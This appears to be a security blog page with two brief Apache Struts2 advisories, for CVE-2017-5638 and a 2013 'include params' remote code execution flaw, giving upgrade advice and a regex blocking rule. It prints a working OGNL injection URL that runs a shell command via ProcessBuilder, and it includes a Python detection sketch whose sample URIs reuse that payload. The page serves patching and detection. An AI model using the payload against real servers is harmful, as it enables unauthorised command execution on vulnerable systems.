Be careful: new vulnerability in Apache Struts2 (CVE-2017-5638).
How to fix: upgrade to Struts 2.3.32 or Struts 2.5.10.1
Affected versions: Struts 2.3.5 - 2.3.31, Struts 2.5 - 2.5.10
POC:
https://github.com/tengzhangchao/Struts2_045-Poc
Tuesday, 7 March 2017
Friday, 19 July 2013
Apache Struts2 include Params Remote Code Execution
An attacker can execute commands and may be able to obtain system permissions.
http://URL/PAGE.ACTION(or .DO)?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(%22whoami%22)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
Solution:
- Upgrade Struts2
- Block requests that match this regex pattern:
(.*)(redirect|action)(.*)java(\.|%2e)lang(\.|%2e)ProcessBuilder(.*)com(\.|%2e)opensymphony(.*)
Reference: http://www.exploit-db.com/exploits/25980/
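A detection sketch for the blocking rule above, added here as an example and not code from the original post: it applies the post's pattern (dots escaped) to the URI both as received and after bounded percent-decoding. The `PREFIX_EXPR` rule, the function names and the sample URIs are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# The post's blocking pattern; dots escaped so they match only "." or "%2e".
POST_PATTERN = re.compile(
    r"(.*)(redirect|action)(.*)java(\.|%2e)lang(\.|%2e)ProcessBuilder"
    r"(.*)com(\.|%2e)opensymphony(.*)",
    re.IGNORECASE | re.DOTALL,
)
# Assumption (not from the post): a broader rule that flags a redirect:/action:
# parameter prefix followed by an expression opener, whatever the expression names.
PREFIX_EXPR = re.compile(r"[?&;](redirect|action):\s*[$%]\{", re.IGNORECASE)
MAX_DECODE_ROUNDS = 3  # bound the work done on untrusted input

def normalize(uri):
    """Percent-decode until stable (bounded), so nested encodings are undone."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri

def classify(uri):
    """Return the names of the rules that fire for one request URI."""
    hits = []
    if POST_PATTERN.search(uri):
        hits.append("post-pattern-raw")
    norm = normalize(uri)
    if POST_PATTERN.search(norm):
        hits.append("post-pattern-normalized")
    if PREFIX_EXPR.search(norm):
        hits.append("prefix-expression")
    return hits

# Constructed sample URIs (shortened from the request shown in the post).
SAMPLES = {
    "as_posted": "/PAGE.action?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder"
                 "(%22whoami%22)).start(),%23m%3d%23context.get("
                 "'com.opensymphony.xwork2.dispatcher.HttpServletResponse')%7D",
    "re_encoded_log": "/PAGE.action?redirect:%24%257B%2523a%253d(new%2520java%252elang"
                      "%252eProcessBuilder(%2522whoami%2522)),%2523context.get("
                      "'com%252eopensymphony')%257D",
    "no_class_name": "/PAGE.action?redirect:%24%7B1%2b1%7D",
    "benign": "/PAGE.action?redirect=home&lang=java",
}
if __name__ == "__main__":
    for name, uri in SAMPLES.items():
        print(f"{name:15} {classify(uri)}")
```

A filter like this only narrows exposure until the Struts2 upgrade listed first under Solution is in place.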